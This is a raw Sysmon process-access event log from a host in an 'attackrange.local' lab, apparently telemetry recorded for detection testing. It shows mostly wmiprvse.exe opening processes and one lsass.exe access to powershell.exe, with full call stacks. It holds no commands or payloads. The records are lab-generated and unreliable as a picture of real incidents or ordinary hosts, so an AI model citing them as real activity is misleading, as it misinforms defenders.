16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 